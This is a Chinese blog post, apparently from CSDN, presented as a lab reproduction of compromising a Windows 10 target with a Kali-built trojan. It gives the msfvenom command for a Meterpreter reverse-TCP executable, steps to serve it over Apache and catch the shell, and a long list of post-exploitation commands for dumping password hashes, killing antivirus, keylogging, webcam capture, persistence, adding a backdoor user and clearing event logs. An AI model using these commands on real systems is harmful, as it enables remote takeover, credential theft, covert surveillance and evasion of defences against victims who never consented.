使用Kali生成木马,渗透Windows系统

最新推荐文章于 2025-06-07 17:55:50 发布
最新推荐文章于 2025-06-07 17:55:50 发布
阅读量841 收藏 21
点赞数 18
CC 4.0 BY-SA版权
分类专栏: kail 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75459324/article/details/147991454

攻击者IP(Kali):192.168.17*.1**

靶机IP(Windows 10):192.168.17*.1**

复现步骤:

一、确保靶机和攻击者可以互相Ping通(即在同一网段下,且不受防火墙防护)

 二、生成木马,在kali打开终端,输入以下命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=5555 -f exe >/root/muma.exe

 msfvenom:Metasploit 框架中的一个工具,用于生成各种类型的 Payload;

-p windows/meterpreter/reverse_tcp:选项指定了要生成的 Payload 的类型,此处为一个 Meterpreter 反向 TCP shell;

lhost:指定了 Payload 需要连接回的攻击者的 IP 地址;

lport:Payload需要连接的端口;

-f exe:指定了 Payload 的输出格式,此处为可执行文件(.exe);

/root/muma.exe:生成木马的存放位置。

三、进入木马文件存放路径,将木马文件muma.exe复制到 /var/www/html,并删除该目录下其余文件

cp muma.exe /var/www/html

rm index.html index.nginx-debian.html

 该步骤是为了将木马植入靶机将要访问的服务器中。

四、 开启apache服务

/etc/init.d/apache2 start

使用/etc/init.d/apache2 status查看服务开启状态

五、在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件muma.exe

 六、开启msfconsole,设置攻击模块并运行

msfconsole

use exploit/multi/handler     //选择exploits

set payload windows/meterpreter/reverse_tcp   //设置payload

set LHOST  攻击者IP        //修改LHOST参数

set LPORT  监听端口        //修改LPORT参数

show options              //查看需要设置的参数

run 或 exploit            //运行攻击模块

(需要在靶机中运行目标文件)

 七、获取目标主机shell

shell

若出现乱码,可以chcp 437

八、 后渗透阶段可进行的操作

Post后渗透模块

sysinfo             #查看目标主机系统信息

run scraper         #查看目标主机详细信息

run hashdump        #导出密码的哈希

load kiwi           #加载

ps                  #查看目标主机进程信息

pwd                 #查看目标当前目录(windows)

getlwd              #查看目标当前目录(Linux)

search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件

download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下

upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程

PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上

idletime            #查看主机运行时间

getuid              #查看获取的当前权限

getsystem           #提权

run  killav         #关闭杀毒软件

screenshot          #截图

webcam_list         #查看目标主机的摄像头

webcam_snap         #拍照

webcam_stream       #开视频

execute  参数  -f 可执行文件   #执行可执行程序

run getgui -u hack -p 123    #创建hack用户,密码为123

run getgui -e                #开启远程桌面

keyscan_start                #开启键盘记录功能

keyscan_dump                 #显示捕捉到的键盘记录信息

keyscan_stop                 #停止键盘记录功能

uictl  disable  keyboard     #禁止目标使用键盘

uictl  enable   keyboard     #允许目标使用键盘

uictl  disable  mouse        #禁止目标使用鼠标

uictl  enable   mouse        #允许目标使用鼠标

load                         #使用扩展库

run             #使用扩展库

run persistence -X -i 5 -p 8888 -r 192.168.10.27        #反弹时间间隔是5s 会自动连接

                                   192.168.27的4444端口,缺点是容易被杀毒软件查杀

portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址

clearev                       #清除日志

漏洞复现:使用Kali制作木马程序
dingbai2663的博客
09-30 3565
漏洞复现:使用Kali制作木马程序 攻击机:Kali2019 靶机:Win7 64位 攻击步骤: 1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下 命令:msfvenom -p windows/meterpreter/reverse_tc...
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8752
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
木马如何生成--简易木马的制作,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
06-07 1272
真不是标题党,这回咱不聊虚头巴脑的学习路线,直接上干货——手把手教你撸一个简易木马。别误会,毕竟,天天用加载器生成木马,却不知道背后原理,跟盲人摸象有啥区别?虽然脚本能绕过360,但终究是治标不治本。
木马如何生成--简易木马的制作,从零基础到精通,收藏这篇就够了!
leah126的博客
04-29 912
真不是标题党,这回咱不聊虚头巴脑的学习路线,直接上干货——手把手教你撸一个简易木马。别误会,毕竟,天天用加载器生成木马,却不知道背后原理,跟盲人摸象有啥区别?虽然脚本能绕过360,但终究是治标不治本。
Python特洛伊木马病毒程序设计(加强版)(一)
qq_36901667的博客
08-26 1191
Python特洛伊木马病毒程序设计,前言
永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2764
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
使用Kali Linux系统生成木马病毒并实现远程控制计算机
2401_84578953的博客
09-21 2861
木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16(虚拟机)Kali Linux 2021(系统
kali生成木马
Massimo__JAVA的博客
04-25 2339
攻击机:kali 192.168.116.128受害机:win7 192.168.116.124目标:使用kali
Kali生成windows木马程序
qq_51950323的博客
09-07 1万+
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
复现|使用Kali生成木马渗透Windows系统
Maricopig的博客
05-13 3395
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
2021-12-09 使用kali生成木马渗透Windows系统
热门推荐
夕阳的街道的博客
12-09 1万+
一、实验题目:使用kali生成木马渗透Windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三、实验环境: 1. 攻击者IP(kali):192.168.112.130 2. 靶机IP(Windows10):192.168.112.136 三、实验步骤: 1. 保证两个系统能相互ping通 2. 生成木马,在kali打开终端,输入以下命令: msfvenom -p windows/meterpre...
kali使用msf生成远控木马入侵windows(简单易懂,小白轻松上手)
保持进步,保持少年感
01-31 1417
kali使用msf生成远控木马入侵windows
kali生成木马程序渗透linux系统
05-24
首先,需要使用 Kali Linux 上的一个名为 Metasploit 的工具来生成木马程序。Metasploit 是一款开源的渗透测试框架,可以用于创建、测试和部署漏洞利用。 其次,需要了解目标系统的漏洞情况,选择合适的漏洞利用...
msf之msfvenom的使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4585
msfvenom的使用
靶机测试,kali生成windows木马程序
2301_76361674的博客
05-03 1570
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限。
kali msfvenom生成木马
qq_33391644的博客
02-06 6404
kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。 这里就只是记录下生成一个程序的过程。 msfvenom msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.首先还是得打开postgresqlro...
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
jennycisp的博客
12-26 3232
apt-get update报错关于kali2019.4的更新源 (任意选择其中一组就可用,我选的清华源)#清华大学#阿里云#中科大#浙大最后最后,上面安装的虚拟机在 apt-get update 之后的 apt-get upgrade报错,原因找了很久,发现可能是因为kali版本和VMware版本相差太远以至于update的包安装覆盖之类的问题导致报错。-----然后我重新下载了iso镜像,kali2021.4版本。结果upgrade还是有问题,甚至还upgrade之后莫名其妙连不上网络。
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 7751
本文对木马生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值